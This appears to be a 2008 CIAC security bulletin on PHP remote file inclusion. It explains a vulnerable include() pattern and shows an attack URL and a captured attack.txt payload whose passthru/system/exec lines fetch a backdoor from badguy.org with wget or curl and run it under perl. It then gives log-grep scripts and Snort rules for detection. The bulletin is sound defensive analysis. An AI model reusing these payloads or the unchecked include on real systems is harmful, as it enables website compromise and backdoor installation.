January 29, 2008 18:00 GMT
Revised: February 14, 2008 18:00 GMT
| PROBLEM: | Unsanitized inputs in PHP programs allow intruders to compromise web servers. |
| PLATFORM: | Web servers with PHP driven pages such as Wikis. |
| ABSTRACT: | Many websites use the PHP programming language to build web pages on the fly from individual files and from values obtained from a database. PHP is widely used to create websites with active content, such as Wikis like MediaWiki used to build Wikipedia. If the PHP programs that generate the web pages are not carefully crafted to check user input before it is used, an intruder could inject code into a page and get it executed, leading to compromise of the website. |
| LINKS: | |
| CIAC BULLETIN: | http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml |
| OTHER LINKS: | SQL Injection - http://www.ciac.org/ciac/techbull/CIACTech06-001.shtml |
[Revised 2/14/08 Added snort rules]
Many websites use the PHP programming language to build web pages on the fly from individual files and from values obtained from a database. PHP is widely used to build Wikis, such as MediaWiki, the software behind Wikipedia. If the PHP programs that generate the web pages are not carefully crafted to check user input before it is used, an intruder could inject code into a page and get it executed. In addition, websites that use a database run the risk of SQL injection attacks that compromise the system or corrupt the database. (See CIACTech06-001 for more information about SQL injection attacks.)
An intruder exploits a PHP based website by injecting code into a PHP script and getting that code to run. For example, if a web page is created by wrapping a standard header and footer around an individual page, the program index.php that is called to create that page might look like the following.
<?php
$page = ($_GET['page']) ? $_GET['page'] : "404.php";
?>
<html>
<head>
<title>My web Page</title>
</head>
<body>
--- html code that creates the page header ---
<?php include($page); ?>
--- html code that creates the page footer ---
</body>
</html>
You would call this page with a URL like the following,
http://mysite.com/index.php?page=mypage.html
Here, mypage.html contains the page contents you want inserted between the header and footer. The PHP code on the web page is the code between the <?php and ?> tags. The first block of code checks whether the request parameter page has been supplied. If it has, its value is stored in the variable $page; otherwise, the name of a 404 (file not found) error page is stored there. The second block of PHP code inserts the contents of the file named by $page into the middle of the web page that is being created and returned to the user.
Notice that the value of $page is checked only to see that it exists, not that it names a legitimate file. A designer may think that, because he creates all the links to index.php, he knows what values it will receive and does not need to check them. However, any user can type any value he desires into his web browser, and that value will be used in index.php, including the name of a file that contains more PHP code, which will then be executed.
PHP has a configuration option called allow_url_fopen which, if set to true, allows a URL to be used where a file name is expected; PHP follows the URL to get the code to insert. This is an extremely dangerous option to leave enabled and should be set to false wherever possible. If allow_url_fopen is true, you can call index.php with a URL like the following,
http://mysite.com/index.php?page=http://evilsite.com/evil.php
PHP will dutifully follow the link and insert evil.php into the middle of the web page and run any code found there.
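As a rough aid for auditing this setting, the sketch below scans php.ini-style text for URL-wrapper options that are switched on. The function name risky_url_settings is hypothetical, and the sketch assumes directives are written as "name = value" with ";" starting a comment. It also checks allow_url_include, which is not discussed in this bulletin: on PHP 5.2 and later, that separate option must also be enabled before include() will follow a URL. Treat the output as a starting point, since settings can also be overridden elsewhere, for example in the web server configuration.

```shell
# Print any line of php.ini-style text (read from stdin) that enables
# allow_url_fopen or allow_url_include.
# Assumption: directives look like "name = value"; commented-out lines
# (starting with ";") are ignored because the pattern is anchored.
risky_url_settings() {
    grep -Ei '^[[:space:]]*allow_url_(fopen|include)[[:space:]]*=[[:space:]]*"?(on|1|true|yes)"?[[:space:]]*(;.*)?$'
}
```

You might run it as risky_url_settings < /etc/php.ini, where the path is only an example; the location of php.ini varies from system to system. No output means neither option was found enabled in that file.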
While analyzing a recent series of attacks on a system, we saw two different attack methodologies used. The first downloads a backdoor program, writes it to disk, and executes it; the backdoor is then used to continue the compromise of the site. The second uses a backdoor program written in PHP, which runs only in memory, repeatedly compromising the system every time a backdoor command is issued.
This first attack method used three different connections to get malicious code on a system and get it run. First, we see in the web logs connections like the following,
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:44:17 -0800] "GET /index.php?page=
http:/badguy.org/data/attack.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
From the user agent string at the end of the log (libwww-perl/5.805) you can tell that this attack was generated by a script rather than by a user typing into a web browser. Here, the attack is attempting to insert the contents of attack.txt into the page generated by index.php, allowing it to run. While this attack may generate a 404 (page not found) error, that does not prove that the attack did not work, only that it did not return a result.
Attack.txt contains lines like the following,
<?
@passthru('cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@passthru('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@system('cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@system('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@exec('cd /tmp;wget http:/badguy.org/data/backdoor.txt;rm -f backdoor.txt*');
@exec('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@shell_exec('cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@shell_exec('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
?>
As you can see, attack.txt tries four different PHP functions (passthru, system, exec, and shell_exec) and two different download tools (wget and curl) to get backdoor.txt onto a system. Each command first changes to the /tmp directory. It then downloads the file and runs it under perl. When the program quits, backdoor.txt is deleted, hiding the fact that it was there.
The file backdoor.txt turned out to be a backdoor program that opens an IRC channel for command and control. Note that attack.txt and backdoor.txt were not given such obvious names but, instead, were things like a.txt or me.jpg to obfuscate their true use. It does not seem to matter what the file name is as PHP deals only with the contents.
The second type of attack starts much like the first one, with a URL to a file inserted into a PHP variable in an attempt to get it downloaded and run. In this case, the downloaded file is the backdoor itself, written in PHP. If the exploit works, the backdoor code is written into the memory image of the web page that is going to be returned to the attacker. The attacker sees a web page appear with the backdoor commands displayed on it. Choosing a command runs the original exploit again but includes some additional values that trigger whatever the command was supposed to do. Again, the web page appears, but this time with the results of the chosen command.

This kind of attack runs only in memory and, unlike the first attack, does not leave files on the system unless the intruder uses the backdoor to put files there.
Detecting the attacks is difficult because most of the queries appear to be normal web requests. While you could look for known bad domains and IP addresses, they tend to change quite often and are not a good indicator of attacks.
The web logs turn out to be a good location for searching for attacks. First, be sure you have turned on extended web logs. Extended logs include the user agent string and the referrer string. Grep these logs for the user agent string "libwww-perl". Hits on this string are scripts that are sending queries to your site, which may or may not be malicious.
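The grep described above can be extended to show which clients are sending scripted requests and how often. The following is a minimal sketch, assuming Apache-style extended log entries in which the client address is the first whitespace-separated field; the function name scripted_clients is hypothetical.

```shell
# Read access-log entries from stdin and print, for each client address
# that used the libwww-perl user agent, the number of such requests,
# busiest client first.
# Assumption: the client address is the first field of each entry.
scripted_clients() {
    grep -F 'libwww-perl' |
    awk '{ count[$1]++ } END { for (ip in count) print count[ip], ip }' |
    sort -rn
}
```

For example, cat access_log* | scripted_clients prints one line per client. As noted above, a hit only shows that a script sent the request, not that the request was malicious.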
In the logs that are returned, you must look for strings of the form,
GET <name>.php?<variable>=<url>
where <name> is the name of some php file, <variable> is some variable, and <url> is a fully qualified link to a file on some web or ftp site. For example,
GET /index.php?page=http:/badguy.org/data/attack.txt
Unless your website legitimately accepts external links as parameter values, log entries of this type are likely attacks.
Another possibility is to use a regular expression to search for the string above. Doing this will also find those attacks that are not sent with a script and those that are sent with a script but are obfuscating that fact by changing the user agent string.
Create the following findattacks script on a Unix system,
for filename ; do
    echo "$filename"
    strings "$filename" | egrep "GET.*php.*http" | egrep -v 'search\.php' | egrep -v '\"GET'
done
Call this script in the web logs directory with,
./findattacks access_log*
The first egrep command searches for GET followed by some characters, followed by php, followed by some characters, followed by http. This often finds too many things, so the last two egrep commands remove any hits that involve search.php or that have a Referrer string (starts with "GET ). You will need to change these as needed depending on how your site does things.
The strings command in the script is not necessary for searching web logs, which are already all text, but it is included so that this script can also be used to search binary packet capture (pcap) files. The strings command extracts the strings from the binary files so they can be searched by the egrep command.
A Snort signature could be built along the same lines as these scripts. All of these methods tend to produce a large number of false positives, so you must look at the captured logs to determine whether they really show an attack. Again, the error values in the logs are not a good indicator of whether an attack succeeded.
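One way to cut down on false positives in web logs is to require that the URL scheme appear immediately after an equals sign inside the request itself, so that an ordinary Referrer string containing http does not trigger a hit. The sketch below is one possible pattern, not the findattacks script itself. The function name remote_include_requests is hypothetical, and the pattern assumes Apache-style entries in which the request is enclosed in double quotes. It will miss attacks in which the URL is percent-encoded.

```shell
# Read access-log entries from stdin and print those where a request for a
# .php file carries a parameter whose value begins with a URL scheme
# (http, https, ftp, ftps, or php), whatever the user agent claims to be.
# Assumption: the request appears as "METHOD /path?query HTTP/x.y" in quotes.
remote_include_requests() {
    grep -Ei '"(GET|POST) [^" ]*\.php\?[^" ]*=(https?|ftps?|php):/'
}
```

Run it the same way as findattacks, for example cat access_log* | remote_include_requests. Because the pattern cannot cross a space or a double quote, a normal request with a Referrer such as "http://mysite.com/" is not reported.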
Note that with the second type of attack described above, you will get a similar web log every time a command is chosen on the attack page. The original attack URL will be repeated but with a POST action instead of GET. For example,
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:44:17 -0800] "GET /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 78
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:45:22 -0800] "POST /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 32039
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:46:13 -0800] "POST /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 32021
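The GET-then-POST pattern shown above can be pulled out of a log with a short filter. The sketch below assumes Apache-style entries in which the client address is the first field, the quoted method is the sixth, and the requested URL is the seventh; the function name backdoor_activity is hypothetical. It reports each client and URL pair that sent at least one POST to a .php page with a remote URL in a parameter, which is the pattern a backdoor command would produce.

```shell
# Read access-log entries from stdin. For every client/URL pair whose
# request carries a remote URL in a parameter, count the POST requests
# and print "count client url" for pairs with at least one POST.
# Assumption: fields are client, -, -, [date, zone], "METHOD, URL, ...
backdoor_activity() {
    grep -Ei '"(GET|POST) [^" ]*\.php\?[^" ]*=(https?|ftps?|php):/' |
    awk '{
        method = toupper(substr($6, 2))   # strip the leading double quote
        key = $1 " " $7                   # client address and requested URL
        seen[key] = 1
        if (method == "POST") posts[key]++
    }
    END {
        for (key in seen)
            if (posts[key] > 0) print posts[key], key
    }'
}
```

A client that appears in this output has probably moved past probing and is issuing commands, so those entries deserve a closer look than a single failed GET.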
The following Snort rules are available from Emerging Threats (Bleeding Snort) to detect these attacks. We have been told that they have few false positives.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list http)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"http"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*https?/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2002997; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list ftp)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"ftp\:"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*ftp/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2003098; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list php)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"php"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery|domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id|df|[a-z](\[.*\])+)\s*=\s*php/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2003935; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT WEB PHP remote file include exploit attempt"; flow: to_server,established; content:"GET"; nocase; depth:3; uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui"; nocase; content:"cmd="; nocase; within: 100; classtype: attempted-admin; sid: 2001810; rev:21;)
This problem is caused by PHP scripts that do not adequately check values passed to them from the user. To protect yourself from being compromised by these attacks, check every user-supplied value before it is used and turn off the allow_url_fopen option wherever that functionality is not needed.
PHP based websites are a fact of life, with many Wikis and other sites built on PHP. While PHP is a very powerful language for creating websites, that power can be used to compromise a site if it is not carefully implemented. Developers need to be particularly careful with strings that a user can change and pass through to the PHP code. They must ensure that the strings contain only what is expected, and they must prevent any unexpected strings from being used to inject code into their scripts. Turning off the allow_url_fopen option is a good start in protecting a site if that functionality is not needed.
Thanks to David Bianco of Jefferson Lab for pointing out the Snort Rules.
Voice: +1 925-422-8193 (7 x 24)
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
World Wide Web: http://www.ciac.org/
http://ciac.llnl.gov
(same machine -- either one will work)
Anonymous FTP: ftp.ciac.org
ciac.llnl.gov
(same machine -- either one will work)